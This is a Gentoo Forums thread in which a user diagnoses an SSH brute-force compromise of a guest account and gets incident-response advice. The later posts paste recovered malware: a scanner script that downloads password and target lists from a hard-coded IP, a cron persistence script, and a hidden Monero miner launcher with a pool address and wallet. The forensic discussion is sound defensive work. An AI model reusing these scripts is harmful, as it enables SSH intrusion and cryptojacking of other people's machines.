View unanswered posts
View posts from last 24 hours

Goto page 1, 2  Next  
Reply to topic    Gentoo Forums Forum Index Networking & Security
View previous topic :: View next topic  
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Fri Nov 10, 2017 1:06 am    Post subject: Does this look like Malware? Reply with quote

My load average is INSANELY high! And I never have seen it this high. Also, I don't run programs as guest.

top -
Code:
 16:51:15 up  6:02,  4 users,  load average: 11.66, 12.68, 9.64
Tasks: 400 total,   6 running, 393 sleeping,   0 stopped,   1 zombie
%Cpu(s): 92.5 us,  5.6 sy,  0.0 ni,  0.2 id,  0.0 wa,  0.0 hi,  1.7 si,  0.0 st
KiB Mem :  8105116 total,  3375236 free,   253048 used,  4476832 buff/cache
KiB Swap:   524284 total,   524284 free,        0 used.  7728456 avail Mem

PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
 8749 guest     20   0   24684   5428   2544 R  51.7  0.1 131:33.27 [sync_supers]  13573 ?        00:00:00 b

The first thing that brought it to my attention was hoarding of CPU, which is shown about (even though at 50% it usually is much higher just maybe caught it at a low point). It isn't a memory intensive thing, but whatever is causing it, also does not stop after PID 8749 is killed. Then what happens is the spawned processes (all labeled b, or something else maybe just one or two letters long) and CPU is now busy again without sync_supers, instead spread throughout the many spawns (each at about 5-10% of CPU). I have I never had any malware on any linux machine before now (if so). What is the process to remove that stuff?

FYI - system underwent major overhaul of new package installation in the last two days -- through an overlay, for Gnome desktop, but I've been in touch with the author and doubt there is any malicious activity stemming from that incident.

ALSO, I feel it is worth mentioning that I recall having to accept a license for some browser looking app, but I don't know why I did. I will have to check with the overlay source to find out more. I can provide more information about the license I accepted, but not right now. Please help so that I can get back to leaving my computer on, instead of off.

Thanks,

Jonathan
me is that the process is not just taking upu 100% CPU, but seems to spawn a ton of others

[Moderator edit: added [code] tags to preserve output layout. -Hu]
Tony0945
Watchman
Watchman

PostPosted: Fri Nov 10, 2017 1:23 am    Post subject: Reply with quote

What overlay? What application?

Gnome - is this systemd?

How about a screen shot of 'top' ?
eccerr0r
Watchman
Watchman

PostPosted: Fri Nov 10, 2017 1:28 am    Post subject: Reply with quote

Wow. Yeah looks like your machine got 0wn3d I think.

Reinstall. I'm not kidding and a bunch of experienced sysadmins would agree. However you should see what data you can collect from the machine so you won't make the same mistake again.

You can use "pstree" to see what process is actually spawning sync_supers. The fact that "guest" is trying to disguise a process to look like a system kernel process is what makes me suspicious. What other processes run as guest? Could it be an application that listens to the network constantly? Curious so that we all can learn from this...

Could you post other lines of 'ps' or 'top' and in [ code ] tags so it's column aligned properly?

(As far as I know, dantrell's overlay is safe, I have not heard any complaints about it. Likely something else.)
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Fri Nov 10, 2017 3:18 am    Post subject: Reply with quote

Would be really nice to know if someone/somewhere had the potential to assess the malwares damage on the system. But since it is just a test environment and a personal computer (not a work machine). That is why I'm trying to both recover some of the information, and assess any possible damages done. Is it at all worth looking into the "payload" or system damage from the malware before undergoing a complete reinstall? In the sense that I would guess based on everything I have on this machine it could take quite a lot of time, probably like 24hrs to compile everything. In case maybe the malware itself was just borrowing system resources instead and not actually leaving any traces behind. is that possible? I guess that would seem to be at odds with the problem happening for a second time after the restarting (last night). As ecerr0r mentioned, which he probably guessed correctly from checking in my other posts...I recently installed Gnome without systemd, through the use of the overlay from Dantrell B.'s Funtoo for gentoo. I in no way think that is what caused the problem either. However one of the updates (requiring me to accept some weird license like Fdkv or another group of 4 letter s variant)

While I agree the best course of action being a thorough and complete reinstall, is that actually going to involve removing or making use of the other documents, music, other media files, and other storage in general on the 2 disks that are potentially involved at this point. (I assume that this has ABSOLUTELY ZERO chance of having effected my other computer that I used to SSH into the one that is effected. Is that right?)

Here's what else are my concerns at this time:
1. The amount of time is ok for the installing, but what about returning back to some idealized setup like I had before the virus? That part of the problem is where this could get kinda crazy, not knowing yet at this point if the files on those hard drives are/should all be considered potentially corrupt or no

2. I wish I could provide a screenshot, maybe I will start it up again later and do that, but my goal was really to recover some stuff, then we can have fun with diagnosing...maybe

3. The external hard drive which is a permanent mount in fstab, has about 1 TB worth of backups, and another 1TB of movies, music. Some documents that I had on there are very old etc. What would be the safest thing, copying those to a USB maybe and then just opening them up off of that in the future? And not copying them back over....or maybe given the specific situation here I am going a bit overboard about the implied consequences.

Please help. Would there happen to be some well known resources for assessing the damage done by the malware on my system?

I will do my best to decsribe it (without a screenshot, the rest of the top looked something like a very long list of somewhat nondescript processes that had different PIDs I think but all had the same name, and command, when expanded (each of them was running /usr/bin/httpd). I would guess about 50 or more of those. And each with a line that looked very simply stated with hardly anything on it, except for a Process name "b"
Jaglover
Watchman
Watchman

PostPosted: Fri Nov 10, 2017 3:23 am    Post subject: Reply with quote

I'd boot from an external media and run diagnostics from there.
eccerr0r
Watchman
Watchman

PostPosted: Fri Nov 10, 2017 4:03 am    Post subject: Reply with quote

So you had httpd/apache running?

A cursory investigation seems to imply that misconfigured or old apache are vulnerable, but if you installed recently, this shouldn't be a problem. Do you know what on your system normally runs as 'guest'? Fortunately it *may* be enough to clean up anything related to user 'guest' but to be safe, a reinstall is warranted.

I have my apache on my system running as 'apache' so that separates that out, if that was the vector.

When you reboot, does the payload run again right away or does it take time before it restarts?

Security is annoying. Intrusion detection can be hard. But nevertheless interesting... (I've been running latest stable apache on my server for many, many years and haven't detected any intrusion yet. A lot of attempts however, and the old bash bug was one of those "scary moments" that I had to disable my webserver (or at least all my bash scripts) until I found a fix for it.

I think the most common attempt at http hacking I see now in terms of intrusion detection is phpmyadmin and a bunch of wordpress exploits (neither of which do I run, so safe there)... There are others but it escapes me what they were at the moment.
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Fri Nov 10, 2017 4:40 am    Post subject: Reply with quote

FYI - as far as I know even though I do recall there being a need for this application at some time (httpd), I don't think that there was going to be a service that was dependent on it.

But as I mentioned, the overhaul on my system means there is a good chance that something got changed around, and maybe the config for some application actually auto-started the service. IDK.

Either way, I will take the precautions to diagnose, and also considering it is likely to require some reinstalling of certain packages at the very least I will still wait to boot into the system or chroot into there so that hopefully should limit the impact of whatever file might be the vector for that process. What does make sense though to me is to report back soon. Once I've gotten to boot up OpenSuse (I think I have it on the same disk already).

Thanks for the suggested help so far.
Hu

PostPosted: Fri Nov 10, 2017 5:35 am    Post subject: Reply with quote

Examining the infection could be an interesting intellectual exercise, but I wouldn't hope that you can learn enough from it to reliably determine the extent of the damage it can cause. You can never be sure that you aren't just seeing the remnants of a much larger package, the bulk of which did its work and then self-deleted to complicate your diagnostics.

As regards what you can and cannot trust, that depends in part on your level of caution. The most cautious approach is to assume that anything that any user (root, your login, any other authorized logins, any service logins, etc.) on that system could access has been accessed and, per Murphy's law, handled in the most damaging way possible. That means you cannot trust the contents of any files, including backups and executables, if that system had the ability to modify them, whether they were stored on its internal drive, an external physically connected drive, an NFS mount that the system could mount read-write, etc. You can retain any suspect files if you have a way to validate them. For example, you can copy off /etc/portage/make.conf if you review it, by hand, on a known clean system, for any suspicious modifications. Practically, you can't salvage any compiled programs because the only efficient way to validate them is to compare them against a known clean copy, and if you have a clean copy, you could just use it directly instead of using it as a reference to validate the suspicious program. Technically, you could salvage compiled programs by hand auditing them, but the amount of effort required is prohibitive.

Since we don't know the purpose of this malware, you must also consider that it had a data exfiltration component. Determine all the files it could access and assume that it uploaded those to an unknown malicious server. Perform according damage control: revoke keys, change passwords, get new fingerprints (if scans were on file), new National Identification Number (if your country considers those secret), etc.
eccerr0r
Watchman
Watchman

PostPosted: Fri Nov 10, 2017 7:08 am    Post subject: Reply with quote

One thing I'm not sure about is that it seems that Gnome has apache as a dependency. I admit I have not done due diligence on figuring out why (some kind of file sharing it seems?), but there's a possibility this is a vector for infection. However one thing is that it doesn't get started automatically for me on any of my systems (all my Gnome machines are systemd machines too), hence I never looked at it. None of my Gnome boxes are outward facing on my network, so it may be another difference.
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Fri Nov 10, 2017 7:45 am    Post subject: Reply with quote

It will turn up most likely (the cause), but I don't get ecerr0r why this would be considered any more outward facing than some other typical setup. Is it because I have opened just 2 ports on my firewalled router, that forward to port 22 on my home machine? I thought the idea was that it was fairly safe and secure to do that. Also, in another sense of the definition every machine that connects to the internet has to be outward facing to the extent that it sends stuff to the router, which then has to go somewhere next, doesn't it?

Anyways, putting my access into the machine aside, because at least for now by my own best estimate there does still seem to be much more likelihood that traffic coming in from internet would have to have targetted an already running process so that means that whether it was Gnome or something else that started a http daemon that was possibly responsive to it. I don't know really I'm just talking our of my you know ***.

So again, my computer is firewalled from the internet just like any other machine is as it only accepts traffic on the local network from outside on the permissible ports of entry, and further then the router will only do its job of routing to an already running service on my desktop.

Whatever it is just blows my mind that Gnome would work this way. Since about this time last year when I abandoned KDE, I had gone DE-less. So for it to happen on day 1 or 2 of going back to a DE really says something terrible about the way these desktop environments are heading. Awful!

Ultimately regardless of the protection that exists with my local firewall (my router), I would suppose that in fact unless I see an issue going on (like the CPU resources I noticed initially and all those running processes) that it is highly unlikely actually that it is anything harmful. But I will go about this just in case:

Thanks jaglover:
Quote:
I'd boot from an external media and run diagnostics from there.

I like this idea because it doesn't assume anything has happened yet, which is also very possible:

And more rationally, since everyone's computer is just constantly available to attacks of any kind, and it is a sort of amazing grace that all of our computers are not just constantly shutting down due to cyber attacks, I will take that luck to mean it might be OK to retain and reuse some of the system. But I will certainly start by removing the guest account, only after I have a chance to check the logs and see what maybe caused the guest process to start in the first place

Thanks for the suggestions. With respect to Binary packages and the time it takes to be rebuilding the system (versus comparing those files) I think it may be possible since I can just use the binaries on my laptop, which is also Gentoo, to check if the programs on the OS that is infected are consistent.

For the diagnostics, does this seem like a fairly good list of things to start doing:
1) FS check and Hard Disk (scan)
2) then, verifying or reinstalling the Software binaries(comparing among my two PC's)
3) also reviewing the compromised acount (guest)
4) And maybe if need be reinstalling sections or ALL of the system, and
5) HOPEFULLY NOT, deleting all my files and starting over...I see this as being very very unreasonable as a solution at least, before I delete them, I will just upload them all to the cloud, and worry later about it (and who else may get these "infected" system aspects)
dantrell
l33t
l33t

PostPosted: Fri Nov 10, 2017 8:49 am    Post subject: Reply with quote

LIsLinuxIsSogood wrote:
My load average is INSANELY high! And I never have seen it this high. Also, I don't run programs as guest.

You didn't really give us enough information to work off of (e.g. while you were online the output of htop, iotop, nethogs and pstree would have been useful but I wouldn't suggest you go online anymore).

However, from what you did share (i.e. the name of the process and the CPU usage) this looks like a bitcoin miner. Your data probably wasn't siphoned as Hu said but you should assume it was regardless.

The question is how it got on your machine.

eccerr0r wrote:
So you had httpd/apache running?

LIsLinuxIsSogood wrote:
Whatever it is just blows my mind that Gnome would work this way.

GNOME User Sharing does pull in Apache but it doesn't automatically run the service, also, it is not outdated.

If you manually ran the service, and if you had something like a WordPress site running, and if the website was internet accessible, it could have easily been that. Same applies to the SSH service allowing password logins.

eccerr0r wrote:
(As far as I know, dantrell's overlay is safe, I have not heard any complaints about it. Likely something else.)

Ebuilds in the overlays are essentially the same as they are (or were) in the main tree.

With respect to Apache, GNOME with systemd as provided by Gentoo would have pulled it in too.

LIsLinuxIsSogood wrote:
So again, my computer is firewalled from the internet just like any other machine is as it only accepts traffic on the local network from outside on the permissible ports of entry, and further then the router will only do its job of routing to an already running service on my desktop.

In general, exposed services and user choices are the biggest vectors for security breaches. In GNOME, what you need to watch out for is WebKitGTK+ (which, for the record, is up-to-date in both the main tree and the overlays).

If you are sure it wasn't from the outside in then it was the other way around which would have been as simple as using Flash on a site that shouldn't have been trusted.

eccerr0r wrote:
Reinstall.

I concur, reinstall and restore your files from a backup that was not accessible by the system.
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Fri Nov 10, 2017 9:14 am    Post subject: Reply with quote

Pretty scarry with respect to Apache and GNOME but i will have to check too about when ot was installed possibly a while ago when i was using some net-analyzer tool that may also have required apache. I cant recall at the moment but that means this could have been something that started a long time ago also perhaps.
NeddySeagoon
Administrator
Administrator

PostPosted: Fri Nov 10, 2017 9:37 am    Post subject: Reply with quote

LIsLinuxIsSogood,

Opening port 22 is inviting brute force attacks on ssh. Such attacks can lead to the genuine [sync_supers] using noticeable amounts CPU time.
However, its not run by user guest, so that's a bad sign.

Firewalls serve two purposes. They stop things getting in, but that's better achieved by not running things that listen on ports you don't want to use.
They stop things phoning home after they do get in. Most users don't set this up as its intrusive, so they end up with a firewall that allows everything out.

Is the guest user allowed to ssh in?
Does the guest user need a password?
If the guest users password is guest (or any dictionary word) and ssh is allowed, you probably have a script kiddie, possibly trying to brute force your root password. Your ssh logs would be useful here.

What does
Code:
lastlog
show?

As to what this guest has already achieved ... who knows?
Maybe you are spamming the rest of the internet?
Bitcoin mining ....
Its an interesting exercise to try to work it out but you will never be sure enough to trust the install.

I would like to think that guest cannot write to disk, you may find some guest owned files in /tmp.
If your guest is trying to cover his tracks a little, they will have been deleted as soon as they were opened, so they won't appear in ls.
If your guest already has root, you will have a rootkit ...

That's taking your
Code:
 PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
 8749 guest     20   0   24684   5428   2544 R  51.7  0.1 131:33.27 [sync_supers]  13573 ?
at face value.

NeddySeagoon

Computer users fall into two groups:-
those that do backups
those that have never had a hard drive fail.
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Fri Nov 10, 2017 6:22 pm    Post subject: Reply with quote

Quote:
Does the guest user need a password?

My guest account may have been created a long time ago, but I'm not sure. Is there a way of finding out when/how it was done?

Quote:
Is the guest user allowed to ssh in?

Neddy, I assume this is actually more to do with the service that is running on the server than which actual port is open on the router, or putting it another way they fact that any port is open at all (for the SSH service on the desktop). That is of course a contributing factor, see below for the SSH messages in log. Definitely looking like the brute force thing that was mentioend. I really hope that it there is no lasting damage from it. I would assume no write privileges to the disk for guest, but I'm not sure, because of certain areas of the filesystem, like /tmp and maybe a few more in those mounted diretories in /etc/fstab that allow for other hard disk access to the OS.

I am hoping if this attack is possibly (probably even) as harmless as just having accessed the guest account and possibly done some spam on the web, or that kind of thing that these logs will help to tell what is the impact, so that I can (once I reinstall, which I plan to do) recover some more recent files maybe as well. We'll have to wait and see. For now, what happens if I just upload all those files to the cloud? Do cloud services in general like dropbox, or google drive not worry about keeping infected files on their servers? That seems weird like that should be an issue but it is not!

Quote:
Opening port 22 is inviting brute force attacks on ssh.

There's many messages in fact so I'm attaching the auth logs (for those that are curious and helpful to act). It appears from the log that it only took a few minutes to hack my system...have a look for yourselves.

auth.log https://paste.pound-python.org/show/5FWLvlaU6IaDcVN15sVx/
auth.log.0 https://paste.pound-python.org/show/1ZnVZ0cvd53CGbQjYGW0/

The first attempt from rhost
[Nov 7 13:46:49] - rhost=122.136.45.138 targeting user "oracle" (invalid user)

Less that two minutes later the same rhost is now logged in as guest on my system which is Crazy.

Then after some 'downtime of the remote host' or 'uptime of my own' (whatever?!?), continued attempts to begin accessing more system resources by going the route of trying to authenticate as different users. This time coming from a different IP.

Nov 6 18:02:37 playby sshd[8588]: Accepted keyboard-interactive/pam for guest from 185.45.193.43 port 53692 ssh2
Nov 6 18:02:37 playby sshd[8588]: pam_unix(sshd:session): session opened for user guest by (uid=0)
Nov 6 18:02:45 playby sshd[8588]: pam_unix(sshd:session): session closed for user guest

Then a later attempt that fails, which makes me think it is brute force, because it should not be so stupid. Or else it is possible that separately I was either attacked or hacked by multiple parties, IDK.

Nov 7 11:33:17 playby sshd[16680]: Did not receive identification string from 146.0.78.62 port 53880
Nov 7 11:33:24 playby sshd[16682]: Bad protocol version identification '\003' from 146.0.78.62 port 41257
Nov 7 11:33:35 playby sshd[16684]: Bad protocol version identification '\003' from 146.0.78.62 port 57611

Quote:

Nov 8 11:28:52 playby sshd[4654]: Server listening on 0.0.0.0 port 22. <---Showing some time about 24hr later that SSH is online

Just showing that I'm online on the Nov 8 which is expected as the machine is always listening on port 22, so that I can get to my files in general.

About an hour later, BOOM

Nov 8 12:58:33 playby sshd[9546]: Accepted password for guest from 155.133.82.12 port 59724 ssh2
Nov 8 13:02:01 playby sshd[9635]: Accepted password for guest from 155.133.82.12 port 60292 ssh2

and it gets worse! A few minutes later is the 1st attempt to access Root
Nov 8 13:04:25 playby sudo: pam_unix(sudo:auth): authentication failure; logname= uid=1002 euid=0 tty= ruser=guest rhost= user=root
Nov 8 13:04:27 playby sudo: pam_unix(sudo:auth): conversation failed
Nov 8 13:04:27 playby sudo: pam_unix(sudo:auth): auth could not identify password for [root]

And for about 5 seconds it tries a few tricks in order to mess with my /etc/passwd file. It fails, and gives up quickly.

But it's not over yet...1 hour later, the original IP attacker is back on strong with the similar attacking pattern, but this time he is equipped with a publickey for the session. And worse, he is going to try and copy that into the sessionkey for root. Which also fails...see here:

Quote:
Nov 8 14:32:40 playby sshd[10668]: Accepted publickey for guest from 155.133.82.12 port 49224 ssh2: RSA SHA256:FlVIVu73IJn/DuQ/a4HXgSW6NADyQKZFb2rd6bzPQ08
Nov 8 14:32:42 playby sshd[10686]: Authentication refused: bad ownership or modes for file /root/.ssh/authorized_keys

At Nov 9 5:47:59 another IP address shows up, and has accepted connection. This is bad. I know, but how bad who's to say. I understand that reinstalling is a safe bet. But if the analogy of the computer could be made to something like a bicycle, that if someone comes along and steals a part off your bike, it is going to matter what they stole in terms of figuring out whether or not to replace the missing piece. If it's a wheel or the handlebar it seems just to be replaced, as would the gears or the chain, unless you like to just pedal in place! But if they stole just a decal, or a carrying basket, or the seat cushion even, it might not make sense to go buying a new bicycle at that point. OK, so it isn't a perfect analogy, but what I'm getting at here is in terms of recovering my files...I can copy them over to USB or the cloud, and then go through a reinstall no problem. But then what happens next when I want to access some of those newer files is the dilemma (should I or shouldn't I risk that?) From the looks here the access to guest account could not go further.

Here's when I shutdown my machine just for a reference
Nov 9 16:54:22 playby shutdown[2131]: shutting down for system halt

Maybe under the further advice I could log back into the system and do some more investigating now?

How would I run diagnositcs (lastlog) on a slave mounted o/s?

What other log files can I include for completeness of information in my post? Syslog? Xlog? Kernel?[/code]
eccerr0r
Watchman
Watchman

PostPosted: Fri Nov 10, 2017 6:55 pm    Post subject: Reply with quote

Well, it looks like we know what the entrance point is: bad password on guest account or somehow the intruder was able to change the password. If you're not aware of it, people are constantly scanning the whole ipv4 address space for machines to exploit. I get hundreds of ssh scans every day, some days it gets into the thousands. And this is my home machine! So far this month (nov1 to nov10 so far today) I've gotten 2000 failed ssh attempts, and it would be higher without some countermeasures I set up.

So other observations with your box: the intruder added a ssh key so they can always get in, in case you change the password to the account.

The intruder is intent on trying to get root privileges via sudo/su, and the logs are showing unsuccessful. However there's no guarantee they did not get root because there have been silent exploits out there for miscellaneous bugs and you'd never know if they got root.

-

The guest account sometimes comes with the system but the password to the account should be scrambled or disabled. That is, unless you changed the password. For instance, on my PVR guest account's password I explicitly changed to "guest" so that someone can login to console via guest/guest and has full access to the account as it's a normal account - which is very bad in terms of security because the guest account can now be logged in remotely. It's somewhat mitigated by not being accessible remotely, however, I did disable this account in sshd just in case. Regardless it's a security hole if people don't understand the implications of an easily guessable password beyond just sshd.

All my other machines, I still have a guest account but the account is disabled. Pam will then disallow its use. Sometimes it's best to outright remove the guest account if you aren't sure if all your applications are going through pam.

-

I would suspect some services like dropbox or google drive would scan files for viruses that would be world accessible after upload. Not sure if the files will not be world accessible. And I doubt they'd do anything it's a unix, system-specific (versus generic) exploit.
NeddySeagoon
Administrator
Administrator

PostPosted: Fri Nov 10, 2017 7:15 pm    Post subject: Reply with quote

LIsLinuxIsSogood,

Lots of signs that your guest login was brute forced but no signs that the attacker got past that.

Next step, move ssh off of port 22. Its security by obscurity (no securitty at all) but will stop most of the random script kiddies.
Some will still port scan you but your logs will be easier to read.

Al the same time, only allow IP ranges you need to connect from to use ssh.
Change to key based login only too. sshd will still go through the password motions but it wall always fail.

I think you can deny guest the use of ssh, but I don't know how.

All of the above is only to get you breathing space for further forensics.

It appears that you have a /home/guest/ dir. If so, its .bash_history will be very educational.
I would expect an attacker to delete that but you never know.

If you don't mind the attacker knowing that they have been discovered, edit /etc/shadow and change the guest password hash to *
It will read
Code:
guest:*:<whatever>
that will stop all password logins to guest.
Rename guests .ssh/authorized_keys so that they don't work too.

As there was a successful key based login, the attacker was able to upload a key to authorized_keys.

NeddySeagoon

those that do backups
eccerr0r
Watchman
Watchman

PostPosted: Fri Nov 10, 2017 7:28 pm    Post subject: Reply with quote

I just added this line to my /etc/ssh/sshd_config on my PVR box :
Code:
DenyUsers guest

This does NOT solve all your guest account problems, just that the infiltrator cannot use guest with sshd anymore.

Also you don't know how long ago they broke into your box. Looks like you've been playing with guest two months ago, but that doesn't matter.

BTW that hacker is sloppy. They should have figured out sudo was not going to give them access and stop leaking what they're trying to do your box...
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Sat Nov 11, 2017 1:57 am    Post subject: Reply with quote

Hey ecerr0r are you suggesting that the hacker wasn't you? That would be a relief by the way. Jk

The guest account I recall was something that was done as part of the video and audio setup for using a certain set of media applications, like Kodi or VLC, or some other stuff. I will be more cautious with it in the future now that I understand how an attack targets the user accounts already on the system and make sure to secure them, or the services running. And as far as web service, I can recall (and verified below) that it was pulled in during my last upgrade/install for media-tv:kodi-17.3-r1.

Sep 28 04:20 net-libs:libmicrohttpd-0.9.52:20170928-042016.log
INFO: setup
Package: net-libs/libmicrohttpd-0.9.52
Repository: gentoo
Maintainer: blueness@gentoo.org
USE: abi_x86_64 amd64 elibc_glibc kernel_linux messages ssl userland_GNU
FEATURES: preserve-libs sandbox userpriv usersandbox
INFO: install
Final size of build directory: 8080 KiB
Final size of installed tree: 712 KiB

Sep 28 04:58 media-tv:kodi-17.3-r1:20170928-045826.log
INFO: setup
Package: media-tv/kodi-17.3-r1
Repository: gentoo
Maintainer: candrews@gentoo.org
Upstream: https://trac.kodi.tv/
USE: X abi_x86_64 alsa amd64 css dbus dvd elibc_glibc kernel_linux nfs opengl pulseaudio python_targets_python2_7 sftp system-ffmpeg udev userland_GNU vaapi webserver xslt zeroconf
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Sat Nov 11, 2017 2:09 am    Post subject: Reply with quote

BTW, the key was/is still there! uid 1002 is my guest account. I checked the rest of the directory for files, and it doesn't seem like much was modified other than that. But I have to continue looking - at least we can agree it was not some very high tech operation that deleted its tracks, and therefore unlikely that it also inflicted other 'unknown' damage but I will be cautious in taking it slow.

root@sysresccd /mnt/custom/home/guest/.ssh % ls -l
total 4
-rw-r--r-- 1 1002 1002 397 Nov 8 21:00 authorized_keys

The key itself, seems to be signed by a particular user@host at the bottom. Maybe I can "FUKC with him and reverse the attack on him, too much work and not worth the effort right. Thank you all for the direction on where to go. The SSH security is going to be a top priority. For now, I've just turned off the service altogether on my laptop machine and desktop.

Thanks agian.
eccerr0r
Watchman
Watchman

PostPosted: Sat Nov 11, 2017 2:24 am    Post subject: Reply with quote

You can't do much with a public key except match with other exploited boxes to see if they were exploited by the same person/private key.

As I have a crappy internet connection, it pains me that I take great risk of DDoS if I try to revenge against hackers that I discover, therefore I've been repressed. I've always wanted to setup a honey pot that has bash pointing to something like

#!/usr/bin/perl
print "$ ";
while(<>) {
print "$ ";
}

and see how long it takes before they figure out they have a dummy shell...
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Sat Nov 11, 2017 9:04 am    Post subject: Reply with quote

Update:
Well I found the payload and it looks to have been around since Oct 11, see below...as Neddy suggested it was in the /tmp folders. I located all files and removed ones uid 1002 owner to. But I don't think it is enough. I'll probably just do a quick archive of the system using tar so I can recover some documents and stuff if I ahve to later.

In order to do the reinstall, would the recommended action be to format or since the partitions exist on the disk alreadyI could just start by creating new filesystems over the existing ones?
Thanks

Code:
root@sysresccd /mnt/custom % find -uid 1002
./tmp/b23z.tar
./tmp/a
./tmp/.b23z
./tmp/.b23z/b
./tmp/.b23z/p
./tmp/.b23z/i
./tmp/.b23z/.a
./tmp/.b23z/x
./tmp/.b23z/s
./tmp/.b23z/d.php
./tmp/mine68b.tar.gz

Also,
Code:
root@sysresccd /mnt/custom/tmp % ls -l
total 2756
-rw-r--r-- 1 1002 1002    5344 Nov 10 00:48 a
-rw-r--r-- 1 1002 1002  952320 Oct 11 12:39 b23z.tar      <<<<<<<<<<<<< primary payload (earlier date)
drwxr-xr-x 2 root root    4096 Nov 10 00:50 cron.lkssGU
drwxrwxrwx 2 1001 1001    4096 Nov 10 00:00 dumps
-rw-r--r-- 1 1001 1001     913 Nov  9 20:28 gameoverlayui.log
-rw-r--r-- 1 1001 1001     934 Nov  9 20:09 gameoverlayui.log.last
-rw-r--r-- 1 1002 1002 1834919 Nov 10 00:48 mine68b.tar.gz           <<<<<<<<<<<<<<< this is a rootkit I though think
drwx------ 2 1001 1001    4096 Nov  9 19:11 pulse-2L9K88eMlGn7
drwx------ 2 root root    4096 Nov  9 18:48 pulse-PKdhtXMmr18n
srwxr-xr-x 1 1001 1001       0 Nov  9 19:21 steam_chrome_shmem_uid1001_spid8004
srwxr-xr-x 1 root root       0 Nov  9 18:48 wpa_ctrl_5586-1

So I've already removed the guest account from /etc/passwd, and deleted the folder for guest, I'm now going to remove all files that guest had access to, which probably means a reinstall.

Last edited by LIsLinuxIsSogood on Sat Nov 11, 2017 9:48 am; edited 2 times in total
NeddySeagoon
Administrator
Administrator

PostPosted: Sat Nov 11, 2017 9:10 am    Post subject: Reply with quote

LIsLinuxIsSogood,

What about /home/guest/.bash_history ?

If its still there, it will show the last 300 commands executed by the guest user.
Use your root account to put it onto a pastebin. Do not allow guest to be used.

Also, deleting that file is the first step in covering tracks.

Googling mine68b.tar.gz says that its probably a virus.
I guess that whatever was running as guest came out of that.
Google can't find mine68b for me to download.

NeddySeagoon

those that do backups

Last edited by NeddySeagoon on Sat Nov 11, 2017 9:16 am; edited 1 time in total
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Sat Nov 11, 2017 9:11 am    Post subject: Reply with quote

Here's more of what the payload looked like:

https://paste.pound-python.org/show/7oX3PQ1xPhEzORSCps5C/

The rest of the files in the subfolder are:
Code:
root@sysresccd /mnt/custom/tmp/.b23z % ls -al
total 1904
drwxr-xr-x  2 root root   4096 Jul 28 13:21 .
drwxrwxrwt 10 root root   4096 Nov 10 00:54 ..
-rw-r--r--  1 1002 1002      0 Nov 10 00:31 .a
-rwxrwxrwx  1 root root 945732 Oct 31  2016 b
-rw-r--r--  1 1002 1002   1802 Nov 10 00:31 d.php
-rw-r--r--  1 1002 1002 976441 Nov 10 00:32 i
-rw-r--r--  1 1002 1002     14 Nov 10 00:31 p
-rwxr-xr-x  1 root root    525 Sep 26 12:26 s
-rwxr-xr-x  1 1002 1002     24 Nov 10 00:31 x

Code:
root@sysresccd /mnt/custom/tmp/.b23z % cat x
nohup ./s >>/dev/null &

Code:
root@sysresccd /mnt/custom/tmp/.b23z % cat p
tomcat qwerty

NOTE: cat i (just a list of a ton of IP addresses), and cat d looks like a list of codes (a five character sequence with first three being 22X followed by two more lower alphabetical, 22Xjw e.g.)

I can't tell what program b does, which is owned by root.

Code:
And here's one of the scripts in the folder:
#!/bin/bash
pass=http://195.22.126.221/feedp.php
ftp=ftp://anonymous:@195.22.126.221/

wget -q $pass
mv feedp.php p
Threads=350
rm -rf d.php

if [[ `uname` == 'Linux' ]]
then

wget -q http://195.22.126.221/d.php
while IFS='' read -r line || [[ -n "$line" ]]; do
   rm -rf wget*
   rm -rf i
   rm -rf v
   rm -rf y
   rm -rf ~/.ssh/known_hosts
   rm -rf n
   rm -rf session.txt
   rm -rf interface.txt
    wget -q $ftp/$line
    mv "$line" i
   port=$(echo $line |cut -d 'X' -f 1)
    ./b 250 $port 10 th 0
done < "d.php"

else
echo die...
fi
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Sat Nov 11, 2017 9:14 am    Post subject: Reply with quote

Quote:
What about /home/guest/.bash_history ?

It WAS there, but after checking it out I found it to be harmless in the sense that it was short, and I did not have an issue with commands there (since I basically do recall running many of them myself). I have since deleted it, so I can't include it at this point :><

But like I said there was really nothing there. So I guess that's a good sign right! Unless like you said the tracks were covered. But I don't know about the answer to that. It does seem unlikely at this point that any real harm was done, is what I think.
LIsLinuxIsSogood
Veteran
Veteran

PostPosted: Sat Nov 11, 2017 9:19 am    Post subject: Reply with quote

Also here's some payload from the rootkit, which I think was never executed as far as I can tell!
Besides these shown here, there are many files that are mostly just loads of information can't tell what's in them
Code:

pwd > dir.dir
dir=$(cat dir.dir)
echo "* * * * * $dir/upd >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep upd
echo "#!/bin/sh
if test -r $dir/bash.pid; then
pid=\$(cat $dir/bash.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
sleep 1
else
cd $dir
./run &>/dev/null
exit 0
fi
fi" >upd
chmod u+x upd
./run &>/dev/null

Code:

#!/bin/bash

proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 45GCe3MjJq9SgJLQrgsvs2fgpX9Tu6B1mZrUnusaPLcSGveHeBHZZhqY9JciEKqYVyACZamLejJDaeydLksTG1iSFgMB68b -p x >>/dev/null &
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 45GCe3MjJq9SgJLQrgsvs2fgpX9Tu6B1mZrUnusaPLcSGveHeBHZZhqY9JciEKqYVyACZamLejJDaeydLksTG1iSFgMB68b -p x >>/dev/null &
fi
echo $! > bash.pid

Code:

#!/bin/bash

proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"

